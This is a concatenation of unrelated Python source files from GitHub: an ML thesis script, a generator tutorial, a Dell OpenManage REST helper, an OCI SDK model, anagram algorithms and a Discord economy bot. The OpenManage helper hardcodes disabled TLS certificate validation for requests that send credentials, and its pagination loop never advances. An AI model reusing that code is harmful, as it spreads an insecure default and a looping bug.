folds[i]\n\n\t\tx_list_general = []\n\t\tx_list_2phase = []\n\t\tx_list_1phase = []\n\t\ty_list = []\n\n\t\tfor j in range(len(folds)):\n\t\t\tif j != i:\n\t\t\t\tfold = folds[j]\n\t\t\t\tx = fold[0]\n\n\t\t\t\tx_list_general.append(x[:, indices_used_per_method[0]])\n\t\t\t\tx_list_2phase.append(x[:, indices_used_per_method[1]])\n\t\t\t\tx_list_1phase.append(x[:, indices_used_per_method[2]])\n\n\t\t\t\ty_list.append(fold[1])\n\n\t\tx_train_general = np.concatenate(x_list_general)\n\t\t\n\t\t\n\t\tx_train_2phase = np.concatenate(x_list_2phase)\n\n\t\t\n\n\t\tx_train_1phase = np.concatenate(x_list_1phase)\n\t\t\n\t\tif len(x_train_general.shape) == 1:\n\t\t\tx_train_general = np.expand_dims(x_train_general, 1)\n\n\t\tif len(x_train_2phase.shape) == 1:\n\t\t\tx_train_2phase = np.expand_dims(x_train_2phase, 1)\n\n\t\tif len(x_train_1phase.shape) == 1:\n\t\t\tx_train_1phase = np.expand_dims(x_train_1phase, 1)\n\n\t\ty_train = np.concatenate(y_list)\n\t\t\n\t\ty_test = fold_test[1]\n\t\tx_test = fold_test[0]\n\n\t\tx_test_general = x_test[:, indices_used_per_method[0]]\n\t\tx_test_2phase = x_test[:, indices_used_per_method[1]]\n\t\tx_test_1phase = x_test[:, indices_used_per_method[2]]\n\n\t\tif len(x_test_general.shape) == 1:\n\t\t\tx_test_general = np.expand_dims(x_test_general, 1)\n\n\t\tif len(x_test_2phase.shape) == 1:\n\t\t\tx_test_2phase = np.expand_dims(x_test_2phase, 1)\n\n\t\tif len(x_test_1phase.shape) == 1:\n\t\t\tx_test_1phase = np.expand_dims(x_test_1phase, 1)\n\n\n\t\ty_train_pred = np.zeros((y_train.shape[0], y_train.shape[1]))\n\t\ty_test_pred = np.zeros((y_test.shape[0], y_test.shape[1]))\n\n\n\t\tmodelCloneGeneral.fit(x_train_general, y_train[:,0])\n\t\tmodelClone2Phase.fit(x_train_2phase, y_train[:,1])\n\t\tmodelClone1Phase.fit(x_train_1phase, y_train[:,2])\n\n\n\t\ty_train_pred[:,0] = modelCloneGeneral.predict(x_train_general)\n\t\ty_train_pred[:,1] = modelClone2Phase.predict(x_train_2phase)\n\t\ty_train_pred[:,2] = modelClone1Phase.predict(x_train_1phase)\n\n\t\tt0 = time.time_ns()\n\t\ty_test_pred[:,0] = modelCloneGeneral.predict(x_test_general)\n\t\ty_test_pred[:,1] = modelClone2Phase.predict(x_test_2phase)\n\t\ty_test_pred[:,2] = modelClone1Phase.predict(x_test_1phase)\n\t\tt1 = time.time_ns()\n\n\t\tt_pred = (t1-t0)/(10**9)\n\n\t\tfold_pred_time[i] = t_pred\n\n\t\tr2_train_folds[i, 0] = r2_score(y_train[:,0], y_train_pred[:,0])\n\t\tr2_train_folds[i, 1] = r2_score(y_train[:,1], y_train_pred[:,1])\n\t\tr2_train_folds[i, 2] = r2_score(y_train[:,2], y_train_pred[:,2])\n\n\t\tr2_test_folds[i, 0] = r2_score(y_test[:,0], y_test_pred[:,0])\n\t\tr2_test_folds[i, 1] = r2_score(y_test[:,1], y_test_pred[:,1])\n\t\tr2_test_folds[i, 2] = r2_score(y_test[:,2], y_test_pred[:,2])\n\n\n\t\tpred_algo = np.argmin(y_test_pred, axis=1)\n\n\n\t\trandom_algo = np.mean(y_test, axis=1)\n\t\tbest_algo = np.argmin(y_test, axis=1)\n\t\tchoose_1phase = np.ones(best_algo.shape)\n\t\tchoose_1phase = np.multiply(choose_1phase,2).astype(int)\n\t\t\n\n\t\tfold_model_choice_time[i] = np.sum(y_test[np.arange(0, y_test.shape[0]), pred_algo])\n\t\tfold_average_choice_time[i] = np.sum(random_algo)\n\t\tfold_best_choice_time[i] = np.sum(y_test[np.arange(0, y_test.shape[0]), best_algo])\n\t\tfold_choose_1phase_time[i] = np.sum(y_test[np.arange(0, y_test.shape[0]), choose_1phase])\n\n\t\tfold_pred_algo.append(pred_algo)\n\t\tfold_best_algo.append(best_algo)\n\t\tbas[i] = balanced_accuracy_score(best_algo, pred_algo)\n\n\n\tr2_train = np.mean(r2_train_folds, axis = 0)\n\tr2_test = np.mean(r2_test_folds, axis = 0)\n\t\n\tmodel_choice_time = np.mean(fold_model_choice_time)\n\taverage_choice_time = np.mean(fold_average_choice_time)\n\tbest_choice_time = np.mean(fold_best_choice_time)\n\tonephase_choice_time = np.mean(fold_choose_1phase_time)\n\taverage_pred_time = np.mean(fold_pred_time)\n\n\n\tif not(modelName is None):\n\t\tprint(\"---------------%s---------------\" % (modelName))\n\telse:\n\t\tprint(\"-----------------------------------\")\n\n\tprint(\"With regression model %s\"%(type(modelGeneral).__name__))\n\tprint(\"R2 score train = %s\" % (r2_train))\n\tprint(\"R2 score test = %s\"% (r2_test))\n\n\tprint(\"Model choice time (test) = %f s\" % (model_choice_time/(10**7)))\n\tprint(\"Model choice time (test) + pred time = %f s\" % (model_choice_time/(10**7) + average_pred_time))\n\tprint(\"Best choice time = %f s\"% (best_choice_time/(10**7)))\n\tprint(\"Average choice time = %f s\"% (average_choice_time/(10**7)))\n\tprint(\"One phase choice time = %f s\"% (onephase_choice_time/(10**7)))\n\tprint(\"average balanced accuracy = %f\"% (np.mean(bas)))\n\n\tif not(modelName is None):\n\t\tprint(\"---------------%s---------------\" % (modelName))\n\telse:\n\t\tprint(\"-----------------------------------\")\n\n\n\n\treturn fold_pred_algo, fold_best_algo\n\nif __name__ == \"__main__\":\n\n\t\n\tdatasetPath = \"datasets/mydt/folds\"\n\n\tfigPath = \"plots\"\n\n\tif not os.path.isdir(figPath+\"/compareLRNNZB\"):\n\t\tos.mkdir(figPath+\"/compareLRNNZB\")\n\n\tfigPath = figPath+\"/compareLRNNZB\"\n\n\tmodelNames = []\n\n\t#training LRNNZB (a)\n\n\tprint(\"Starting the training and testing of LRNNZB (a)\")\n\tfeatureIndicesL = np.array([3,1])\n\tfeatureIndicesU = np.array([7,5])\n\tsizebIndicesL = np.array([1])\n\tsizebIndicesU = np.array([5])\n\n\tyIndicesL = np.array([11, 12, 13])\n\tyIndicesU = np.array([14, 15, 16])\n\n\tfeatureNames = [\"Number of non-zero elements in b\",\n\t\t\t\t\t\"Number of non-zero elements in b\",\n\t\t\t\t\t\"Number of non-zero elements in b\"]\n\n\t#loads the folds\n\tlist_folds, time_per_fold = load_folds(datasetPath, featureIndicesL, featureIndicesU, yIndicesL, yIndicesU, return_times = True)\n\tlist_folds_size_b = load_folds(datasetPath, sizebIndicesL, sizebIndicesU, yIndicesL, yIndicesU)\n\n\n\t#only take the time of the algorithm and not the feature computation time\n\tfor i in range(len(time_per_fold)):\n\t\t\n\t\tfold_time = time_per_fold[i]\n\n\t\ttime_per_fold[i] = fold_time[:, np.array([0,1,2])]\n\t\n\n\tindices_used_per_method = [0, 0, 0]\n\n\t#prepare the dataset for intersection plots, etc\n\t#that take 7 folds for training and 3 folds for testing\n\n\tlist_x_test = []\n\tlist_y_test = []\n\tlist_x_train = []\n\tlist_y_train = []\n\n\tfor i in range(len(list_folds)):\n\n\t\tfold = list_folds[i]\n\t\tif i >=7:\n\t\t\tlist_x_test.append(fold[0])\n\t\t\tlist_y_test.append(fold[1])\n\t\telse:\n\t\t\tlist_x_train.append(fold[0])\n\t\t\tlist_y_train.append(fold[1])\n\n\tx_test = np.concatenate(list_x_test)\n\tx_train = np.concatenate(list_x_train)\n\n\tx_test_size_b = x_test[:,1]\n\tx_test = x_test[:,0]\n\t\n\tx_train_size_b = x_train[:,1]\n\tx_train = x_train[:,0]\n\n\n\tx_test = np.expand_dims(x_test, 1)\n\tx_test_size_b = np.expand_dims(x_test_size_b, 1)\n\t\n\tx_train = np.expand_dims(x_train, 1)\n\tx_train_size_b = np.expand_dims(x_train_size_b, 1)\n\n\ty_test = np.concatenate(list_y_test)\n\ty_train = np.concatenate(list_y_train)\n\n\t#train LRNNZB (a)\n\tmodelNames.append(\"LNNZB (a)\")\n\n\tLRNNZBa = LR3M(\"LNNZB (a)\", featureNames)\n\n\tfold_pred_algo_a, fold_best_algo = LRNNZBa.pred_time_cv(list_folds, indices_used_per_method, modelName = \"LRNNZBa\")\n\n\n\tLRNNZBa.regGeneral.fit(x_train, y_train[:,0])\n\tLRNNZBa.reg2Phase.fit(x_train, y_train[:,1])\n\tLRNNZBa.reg1Phase.fit(x_train, y_train[:,2])\n\t\n\tprint(\"Making the intersection plot\")\n\tplotIntersections(LRNNZBa, x_train, x_train, x_train, figPath)\n\n\tprint(\"Making the regressions plot\")\n\tplotRegressions(LRNNZBa, x_train, x_train, x_train, y_train[:,0], y_train[:,1], y_train[:,2], figPath)\n\t\n\n\t#train LRNNZB (b)\n\tLRNNZBb = LR3M(\"LNNZB (b)\", featureNames)\n\tindices_used_per_method = [1,0,0]\n\tfold_pred_algo_b, fold_best_algo = LRNNZBb.pred_time_cv(list_folds, indices_used_per_method, modelName = \"LRNNZBb\")\n\n\tLRNNZBb.regGeneral.fit(x_train_size_b, y_train[:,0])\n\tLRNNZBb.reg2Phase.fit(x_train, y_train[:,1])\n\tLRNNZBb.reg1Phase.fit(x_train, y_train[:,2])\n\t\n\tprint(\"Making the intersection plot\")\n\tplotIntersections(LRNNZBb, None, x_train, x_train, figPath)\n\n\tprint(\"Making the regressions plot\")\n\tplotRegressions(LRNNZBb, x_train_size_b, x_train, x_train, y_train[:,0], y_train[:,1], y_train[:,2], figPath)\n\n\tpredList = []\n\tpredList.append(fold_pred_algo_a)\n\tpredList.append(fold_pred_algo_b)\n\tpredList.append(fold_best_algo)\n\n\t\n\n\tmodel_names = []\n\tmodel_names.append('LRNNZBa')\n\tmodel_names.append('LRNNZBb')\n\tmodel_names.append('GT')\n\tplot_per_b_size_folds(predList, list_folds, list_folds_size_b, time_per_fold, model_names, figPath+\"/LRNNZB_\")","repo_name":"Gael-di-raimo/MasterThesis","sub_path":"LRNNZB.py","file_name":"LRNNZB.py","file_ext":"py","file_size_in_byte":9673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4384354367","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# __author__ hsz\n\n\"\"\"\n生成器函数: 函数里只要有yield 关键字\n\n生成器函数的实现\n\n\"\"\"\n\n\ndef gen_func():\n yield 1\n\n\n# 惰性求值和延迟求值提供了可能\n\n\ndef fib(index):\n \"\"\"\n 斐波那契\n :param index:\n :return:\n \"\"\"\n if index <= 2:\n return 1\n else:\n return fib(index - 1) + fib(index - 2)\n\n\n\ndef fib2(index):\n \"\"\"\n 斐波那契的实现过程\n :param index:\n :return:\n \"\"\"\n re_list = []\n n, a, b = 0, 0, 1\n while n < index:\n re_list.append(b)\n a, b = b, a + b\n n += 1\n return re_list\n\n\ndef fib_gen(index):\n \"\"\"\n 使用生成器 斐波那契的实现过程\n :param index:\n :return:\n \"\"\"\n n, a, b = 0, 0, 1\n while n < index:\n yield b\n a, b = b, a + b\n n += 1\n\n\ndef func():\n return 1\n\n\nif __name__ == \"__main__\":\n # 返回生成器对象:python 编译字节码的时候就产生了\n gen = gen_func()\n print(gen)\n for value in gen:\n print(value)\n\n re = func()\n print(re)\n\n print(fib2(10))\n\n for value in fib_gen(10):\n print(value)\n","repo_name":"Thousandhack/reading_notes_python","sub_path":"advanced_python/035_gen_func.py","file_name":"035_gen_func.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12915756619","text":"from __future__ import (absolute_import, division, print_function)\n__metaclass__ = type\n\nimport json\nfrom ansible.module_utils.urls import open_url, ConnectionError, SSLValidationError\nfrom ansible.module_utils.six.moves.urllib.error import URLError, HTTPError\nfrom ansible.module_utils.six.moves.urllib.parse import urlencode\n\nSESSION_RESOURCE_COLLECTION = {\n \"SESSION\": \"SessionService/Sessions\",\n \"SESSION_ID\": \"SessionService/Sessions('{Id}')\",\n}\n\n\nclass OpenURLResponse(object):\n \"\"\"Handles HTTPResponse\"\"\"\n\n def __init__(self, resp):\n self.body = None\n self.resp = resp\n if self.resp:\n self.body = self.resp.read()\n\n @property\n def json_data(self):\n try:\n return json.loads(self.body)\n except ValueError:\n raise ValueError(\"Unable to parse json\")\n\n @property\n def status_code(self):\n return self.resp.getcode()\n\n @property\n def success(self):\n return self.status_code in (200, 201, 202, 204)\n\n @property\n def token_header(self):\n return self.resp.headers.get('X-Auth-Token')\n\n\nclass RestOME(object):\n \"\"\"Handles OME API requests\"\"\"\n\n def __init__(self, module_params=None, req_session=False):\n self.module_params = module_params\n self.hostname = self.module_params[\"hostname\"]\n self.username = self.module_params[\"username\"]\n self.password = self.module_params[\"password\"]\n self.port = self.module_params[\"port\"]\n self.req_session = req_session\n self.session_id = None\n self.protocol = 'https'\n self._headers = {'Content-Type': 'application/json', 'Accept': 'application/json'}\n\n def _get_base_url(self):\n \"\"\"builds base url\"\"\"\n return '{0}://{1}:{2}/api'.format(self.protocol, self.hostname, self.port)\n\n def _build_url(self, path, query_param=None):\n \"\"\"builds complete url\"\"\"\n url = path\n base_uri = self._get_base_url()\n if path:\n url = '{0}/{1}'.format(base_uri, path)\n if query_param:\n \"\"\"Ome filtering does not work as expected when '+' is passed,\n urlencode will encode spaces as '+' so replace it to '%20'\"\"\"\n url += \"?{0}\".format(urlencode(query_param).replace('+', '%20'))\n return url\n\n def _url_common_args_spec(self, method, api_timeout, headers=None):\n \"\"\"Creates an argument common spec\"\"\"\n req_header = self._headers\n if headers:\n req_header.update(headers)\n url_kwargs = {\n \"method\": method,\n \"validate_certs\": False,\n \"use_proxy\": True,\n \"headers\": req_header,\n \"timeout\": api_timeout,\n \"follow_redirects\": 'all',\n }\n return url_kwargs\n\n def _args_without_session(self, method, api_timeout=30, headers=None):\n \"\"\"Creates an argument spec in case of basic authentication\"\"\"\n req_header = self._headers\n if headers:\n req_header.update(headers)\n url_kwargs = self._url_common_args_spec(method, api_timeout, headers=headers)\n url_kwargs[\"url_username\"] = self.username\n url_kwargs[\"url_password\"] = self.password\n url_kwargs[\"force_basic_auth\"] = True\n return url_kwargs\n\n def _args_with_session(self, method, api_timeout=30, headers=None):\n \"\"\"Creates an argument spec, in case of authentication with session\"\"\"\n url_kwargs = self._url_common_args_spec(method, api_timeout, headers=headers)\n url_kwargs[\"force_basic_auth\"] = False\n return url_kwargs\n\n def invoke_request(self, method, path, data=None, query_param=None, headers=None,\n api_timeout=30, dump=True):\n \"\"\"\n Sends a request through open_url\n Returns :class:`OpenURLResponse` object.\n :arg method: HTTP verb to use for the request\n :arg path: path to request without query parameter\n :arg data: (optional) Payload to send with the request\n :arg query_param: (optional) Dictionary of query parameter to send with request\n :arg headers: (optional) Dictionary of HTTP Headers to send with the\n request\n :arg api_timeout: (optional) How long to wait for the server to send\n data before giving up\n :arg dump: (Optional) boolean value for dumping payload data.\n :returns: OpenURLResponse\n \"\"\"\n try:\n if 'X-Auth-Token' in self._headers:\n url_kwargs = self._args_with_session(method, api_timeout, headers=headers)\n else:\n url_kwargs = self._args_without_session(method, api_timeout, headers=headers)\n if data and dump:\n data = json.dumps(data)\n url = self._build_url(path, query_param=query_param)\n resp = open_url(url, data=data, **url_kwargs)\n resp_data = OpenURLResponse(resp)\n except (HTTPError, URLError, SSLValidationError, ConnectionError) as err:\n raise err\n return resp_data\n\n def __enter__(self):\n \"\"\"Creates sessions by passing it to header\"\"\"\n if self.req_session:\n payload = {'UserName': self.username,\n 'Password': self.password,\n 'SessionType': 'API', }\n path = SESSION_RESOURCE_COLLECTION[\"SESSION\"]\n resp = self.invoke_request('POST', path, data=payload)\n if resp and resp.success:\n self.session_id = resp.json_data.get(\"Id\")\n self._headers[\"X-Auth-Token\"] = resp.token_header\n else:\n msg = \"Could not create the session\"\n raise ConnectionError(msg)\n return self\n\n def __exit__(self, exc_type, exc_value, traceback):\n \"\"\"Deletes a session id, which is in use for request\"\"\"\n if self.session_id:\n path = SESSION_RESOURCE_COLLECTION[\"SESSION_ID\"].format(Id=self.session_id)\n self.invoke_request('DELETE', path)\n return False\n\n def get_all_report_details(self, uri):\n \"\"\"\n This implementation mainly dependent on '@odata.count' value.\n Currently first request without query string, always returns total number of available\n reports in '@odata.count'.\n \"\"\"\n try:\n resp = self.invoke_request('GET', uri)\n data = resp.json_data\n report_list = data[\"value\"]\n total_count = data['@odata.count']\n remaining_count = total_count - len(report_list)\n first_page_count = len(report_list)\n while remaining_count > 0:\n resp = self.invoke_request('GET', uri, query_param={\"$top\": first_page_count, \"$skip\": len(report_list)})\n data = resp.json_data\n value = data[\"value\"]\n report_list.extend(value)\n remaining_count = remaining_count - len(value)\n return {\"resp_obj\": resp, \"report_list\": report_list}\n except (URLError, HTTPError, SSLValidationError, ConnectionError, TypeError, ValueError) as err:\n raise err\n\n def get_job_type_id(self, jobtype_name):\n \"\"\"This provides an ID of the job type.\"\"\"\n job_type_id = None\n resp = self.invoke_request('GET', \"JobService/JobTypes\")\n data = resp.json_data[\"value\"]\n for each in data:\n if each[\"Name\"] == jobtype_name:\n job_type_id = each[\"Id\"]\n break\n return job_type_id\n\n def get_device_id_from_service_tag(self, service_tag):\n \"\"\"\n :param service_tag: service tag of the device\n :return: dict\n Id: int: device id\n value: dict: device id details\n not_found_msg: str: message if service tag not found\n \"\"\"\n device_id = None\n query = \"DeviceServiceTag eq '{0}'\".format(service_tag)\n response = self.invoke_request(\"GET\", \"DeviceService/Devices\", query_param={\"$filter\": query})\n value = response.json_data.get(\"value\", [])\n device_info = {}\n if value:\n device_info = value[0]\n device_id = device_info[\"Id\"]\n return {\"Id\": device_id, \"value\": device_info}\n\n def get_all_items_with_pagination(self, uri):\n \"\"\"\n This implementation mainly to get all available items from ome for pagination\n supported GET uri\n :param uri: uri which supports pagination\n :return: dict.\n \"\"\"\n try:\n resp = self.invoke_request('GET', uri)\n data = resp.json_data\n total_items = data.get(\"value\", [])\n total_count = data.get('@odata.count', 0)\n next_link = data.get('@odata.nextLink', \"\")\n while next_link:\n resp = self.invoke_request('GET', uri)\n data = resp.json_data\n value = data[\"value\"]\n total_items.extend(value)\n return {\"total_count\": total_count, \"value\": total_items}\n except (URLError, HTTPError, SSLValidationError, ConnectionError, TypeError, ValueError) as err:\n raise err\n\n def get_device_type(self):\n \"\"\"\n Returns device type map where as key is type and value is type name\n eg: {1000: \"SERVER\", 2000: \"CHASSIS\", 4000: \"NETWORK_IOM\", \"8000\": \"STORAGE_IOM\", 3000: \"STORAGE\"}\n :return: dict, first item dict gives device type map\n \"\"\"\n device_map = {}\n response = self.invoke_request(\"GET\", \"DeviceService/DeviceType\")\n if response.json_data.get(\"value\"):\n device_map = dict([(item[\"DeviceType\"], item[\"Name\"]) for item in response.json_data[\"value\"]])\n return device_map\n","repo_name":"varungarg26/monitor-me","sub_path":"venv/lib/python3.9/site-packages/ansible_collections/dellemc/openmanage/plugins/module_utils/ome.py","file_name":"ome.py","file_ext":"py","file_size_in_byte":9724,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"31605865679","text":"from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401\nfrom oci.decorators import init_model_state_from_kwargs\n\n\n@init_model_state_from_kwargs\nclass PurgeWebAppAccelerationCacheDetails(object):\n \"\"\"\n Specifies options for a cache purge.\n \"\"\"\n\n #: A constant which can be used with the purge_type property of a PurgeWebAppAccelerationCacheDetails.\n #: This constant has a value of \"ENTIRE_CACHE\"\n PURGE_TYPE_ENTIRE_CACHE = \"ENTIRE_CACHE\"\n\n def __init__(self, **kwargs):\n \"\"\"\n Initializes a new PurgeWebAppAccelerationCacheDetails object with values from keyword arguments. This class has the following subclasses and if you are using this class as input\n to a service operations then you should favor using a subclass over the base class:\n\n * :class:`~oci.waa.models.PurgeEntireWebAppAccelerationCacheDetails`\n\n The following keyword arguments are supported (corresponding to the getters/setters of this class):\n\n :param purge_type:\n The value to assign to the purge_type property of this PurgeWebAppAccelerationCacheDetails.\n Allowed values for this property are: \"ENTIRE_CACHE\"\n :type purge_type: str\n\n \"\"\"\n self.swagger_types = {\n 'purge_type': 'str'\n }\n\n self.attribute_map = {\n 'purge_type': 'purgeType'\n }\n\n self._purge_type = None\n\n @staticmethod\n def get_subtype(object_dictionary):\n \"\"\"\n Given the hash representation of a subtype of this class,\n use the info in the hash to return the class of the subtype.\n \"\"\"\n type = object_dictionary['purgeType']\n\n if type == 'ENTIRE_CACHE':\n return 'PurgeEntireWebAppAccelerationCacheDetails'\n else:\n return 'PurgeWebAppAccelerationCacheDetails'\n\n @property\n def purge_type(self):\n \"\"\"\n **[Required]** Gets the purge_type of this PurgeWebAppAccelerationCacheDetails.\n Type of cache purge to perform.\n\n Allowed values for this property are: \"ENTIRE_CACHE\"\n\n\n :return: The purge_type of this PurgeWebAppAccelerationCacheDetails.\n :rtype: str\n \"\"\"\n return self._purge_type\n\n @purge_type.setter\n def purge_type(self, purge_type):\n \"\"\"\n Sets the purge_type of this PurgeWebAppAccelerationCacheDetails.\n Type of cache purge to perform.\n\n\n :param purge_type: The purge_type of this PurgeWebAppAccelerationCacheDetails.\n :type: str\n \"\"\"\n allowed_values = [\"ENTIRE_CACHE\"]\n if not value_allowed_none_or_none_sentinel(purge_type, allowed_values):\n raise ValueError(\n f\"Invalid value for `purge_type`, must be None or one of {allowed_values}\"\n )\n self._purge_type = purge_type\n\n def __repr__(self):\n return formatted_flat_dict(self)\n\n def __eq__(self, other):\n if other is None:\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n return not self == other\n","repo_name":"oracle/oci-python-sdk","sub_path":"src/oci/waa/models/purge_web_app_acceleration_cache_details.py","file_name":"purge_web_app_acceleration_cache_details.py","file_ext":"py","file_size_in_byte":3125,"program_lang":"python","lang":"en","doc_type":"code","stars":345,"dataset":"github-code","pt":"52"} +{"seq_id":"4382630077","text":"# !/usr/bin/env python\n# -*- coding:utf-8 -*-\n# __author__ hsz\n\n\"\"\"\n所谓“变位词”是指两个词之间存在组成字母的重新排列关系\n\"\"\"\n\n\"\"\"\n解决方式一:逐字检查\n解法思路\n将词1 中的字符逐个到词2 中检��是否存在\n存在就 “ 打勾 ” 标记(防止重复检查)\n如果每个字符都能找到,则两个词是变位词,\n只要有1个字符找不到,就不是变位词。\n\"\"\"\n\n\ndef anagram_solution(str_one, str_two):\n if len(str_one) != len(str_two):\n return False\n list_two = list(str_two)\n pos_one = 0\n still = True\n while pos_one < len(str_one) and still:\n pos_two = 0\n found = False\n while pos_two < len(list_two) and not found:\n if str_one[pos_one] == list_two[pos_two]:\n found = True\n else:\n pos_two = pos_two + 1\n if found:\n list_two[pos_two] = None\n else:\n still = False\n pos_one = pos_one + 1\n return still\n\n\n\"\"\"\n解决方法二:排序比较\n两个sort并不是无代价的\n本算法的运行时间数量级就等于排序过程\n的数量级O(n log n)\n\"\"\"\n\n\ndef anagram_solution_two(str_one, str_two):\n if len(str_one) != len(str_two):\n return False\n list_one = list(str_one)\n list_one.sort()\n list_two = list(str_two)\n list_two.sort()\n pos = 0\n still = True\n while pos < len(str_one) and still:\n if list_one[pos] == list_two[pos]:\n pos += 1\n else:\n still = False\n\n return still\n\n\n\"\"\"\n解法4:计数比较-算法分析\n❖解题思路:对比两个词中每个字母出现的\n次数,如果26个字母出现的次数都相同的\n话,这两个字符串就一定是变位词\n❖具体做法:为每个词设置一个26位的计数\n器,先检查每个词,在计数器中设定好每\n个字母出现的次数\n❖计数完成后,进入比较阶段,看两个字符\n串的计数器是否相同,如果相同则输出是\n变位词的结论\n\n\n值得注意的是,本算法依赖于两个长度为\n26的计数器列表,来保存字符计数,这相\n比前3个算法需要更多的存储空间\n如果考虑由大字符集构成的词(如中文具有上万\n不同字符),还会需要更多存储空间。\n\"\"\"\n\n\ndef anagram_solution_three(str_one, str_two):\n if len(str_one) != len(str_two):\n return False\n list_one = [0] * 26\n list_two = [0] * 26\n for i in range(len(str_one)):\n pos = ord(str_one[i]) - ord('a')\n list_one[pos] = list_one[pos] + 1\n\n for i in range(len(str_two)):\n pos = ord(str_two[i]) - ord('a')\n list_two[pos] = list_two[pos] + 1\n j = 0\n still = True\n while j < 26 and still:\n if list_one[j] == list_two[j]:\n j += 1\n else:\n still = False\n return still\n\n\nif __name__ == \"__main__\":\n print(\"=========法一=======================================\")\n print(anagram_solution('abcd32', 'acbd32'))\n print(anagram_solution('abcd322', 'acbd323'))\n print(\"=========法二=======================================\")\n print(anagram_solution_two('abcd32', 'acbd32'))\n print(anagram_solution_two('abcd322', 'acbd323'))\n print(\"=========法三=======条件仅限于小写字母==============\")\n print(anagram_solution_three('abcdgd', 'acbdgd'))\n print(anagram_solution_three('abcdhz', 'acbdha'))\n","repo_name":"Thousandhack/algorithms_training","sub_path":"data_structure/anagram_solution.py","file_name":"anagram_solution.py","file_ext":"py","file_size_in_byte":3416,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37661249447","text":"import asyncio\r\nimport random\r\nimport typing\r\n\r\nimport discord\r\nfrom discord import app_commands\r\n\r\nfrom DiscordEconomy.Sqlite import Economy\r\n# or if you want to use mongodb\r\n# from DiscordEconomy.MongoDB import Economy\r\n\r\n\r\n# Pass here token as string and guild id where to register slash commands\r\n\r\nGUILD_ID = 1234567890\r\nTEST_GUILD = discord.Object(id=GUILD_ID)\r\nBOT_TOKEN = \"\"\r\nUSER_COOLDOWNS = {}\r\n\r\n\r\n\r\ndef is_registered():\r\n async def predicate(interaction: discord.Interaction):\r\n r = await economy.is_registered(interaction.user.id)\r\n return r\r\n\r\n return app_commands.check(predicate)\r\n\r\n\r\ndef cooldown(when: typing.Union[int, float]):\r\n async def __handle_cooldown(when: typing.Union[int, float], interaction: discord.Interaction):\r\n USER_COOLDOWNS[interaction.user.id] = when\r\n await asyncio.sleep(when)\r\n USER_COOLDOWNS.pop(interaction.user.id)\r\n\r\n async def predicate(interaction: discord.Interaction):\r\n if interaction.user.id in USER_COOLDOWNS:\r\n raise app_commands.AppCommandError(\"User is on cooldown\")\r\n\r\n asyncio.ensure_future(__handle_cooldown(when, interaction))\r\n\r\n return True\r\n\r\n return app_commands.check(predicate)\r\n\r\n\r\nitems_list = {\r\n \"Items\": {\r\n \"crystal\": {\r\n \"available\": True,\r\n \"price\": 300,\r\n \"description\": \"Provide description for item here\"\r\n },\r\n \"fishing rod\": {\r\n \"available\": True,\r\n \"price\": 1200,\r\n \"description\": \"Provide description for item here\"\r\n },\r\n \"pickaxe\": {\r\n \"available\": True,\r\n \"price\": 1500,\r\n \"description\": \"Provide description for item here\"\r\n },\r\n \"sword\": {\r\n \"available\": True,\r\n \"price\": 700,\r\n \"description\": \"Provide description for item here\"\r\n },\r\n \"dorayaki\": {\r\n \"available\": True,\r\n \"price\": 12500,\r\n \"description\": \"Provide description for item here\"\r\n },\r\n \"pancake\": {\r\n \"available\": True,\r\n \"price\": 10000,\r\n \"description\": \"Provide description for item here\"\r\n }\r\n }}\r\n\r\n\r\nclass DiscordEconomyClient(discord.Client):\r\n def __init__(self):\r\n intents = discord.Intents.default()\r\n intents.members = True\r\n\r\n self.is_synced = False\r\n\r\n super().__init__(intents=intents)\r\n\r\n async def on_ready(self):\r\n await self.wait_until_ready()\r\n\r\n if not self.is_synced:\r\n print(\"Syncing application(/) commands\")\r\n await tree.sync(guild=TEST_GUILD)\r\n\r\n\r\n\r\nclass Shop(app_commands.Group):\r\n\r\n @app_commands.command(description=\"See the list of all available items.\")\r\n @is_registered()\r\n async def items(self, interaction: discord.Interaction):\r\n\r\n embed = discord.Embed(\r\n colour=discord.Color.from_rgb(244, 182, 89)\r\n )\r\n embed.set_author(name=\"Items\")\r\n for item in items_list[\"Items\"].items():\r\n\r\n if item[1][\"available\"]:\r\n embed.add_field(name=item[0].capitalize(), value=f\"\"\"Price: **{item[1]['price']}**\r\n Description: **{item[1]['description']}**\"\"\")\r\n\r\n embed.set_footer(text=f\"Invoked by {interaction.user.name}\",\r\n icon_url=interaction.user.avatar.url)\r\n await interaction.response.send_message(embed=embed)\r\n\r\n @app_commands.command(description=\"Buy an item!\")\r\n @is_registered()\r\n async def buy(self, interaction: discord.Interaction, *, item: str):\r\n\r\n _item = item.lower()\r\n _cache = []\r\n embed = discord.Embed(\r\n colour=discord.Color.from_rgb(244, 182, 89)\r\n )\r\n\r\n for item in items_list[\"Items\"].items():\r\n if item[0] == _item:\r\n _cache.append(item[0])\r\n\r\n r = await economy.get_user(interaction.user.id)\r\n\r\n if item[0] in r.items:\r\n embed.add_field(name=\"Error\", value=f\"You already have that item!\")\r\n embed.set_footer(text=f\"Invoked by {interaction.user.name}\",\r\n icon_url=interaction.user.avatar.url)\r\n await interaction.response.send_message(embed=embed)\r\n\r\n return\r\n\r\n if r.bank >= item[1][\"price\"]:\r\n await economy.add_item(interaction.user.id, item[0])\r\n await economy.remove_money(interaction.user.id, \"bank\", item[1][\"price\"])\r\n\r\n embed.add_field(name=\"Success\", value=f\"Successfully bought **{item[0]}**!\")\r\n embed.set_footer(text=f\"Invoked by {interaction.user.name}\",\r\n icon_url=interaction.user.avatar.url)\r\n await interaction.response.send_message(embed=embed)\r\n\r\n else:\r\n\r\n embed.add_field(name=\"Error\", value=f\"You don't have enought money to buy this item!\")\r\n embed.set_footer(text=f\"Invoked by {interaction.user.name}\",\r\n icon_url=interaction.user.avatar.url)\r\n await interaction.response.send_message(embed=embed)\r\n break\r\n\r\n if len(_cache) <= 0:\r\n embed.add_field(name=\"Error\", value=\"Item with that name does not exists!\")\r\n await interaction.response.send_message(embed=embed)\r\n\r\n 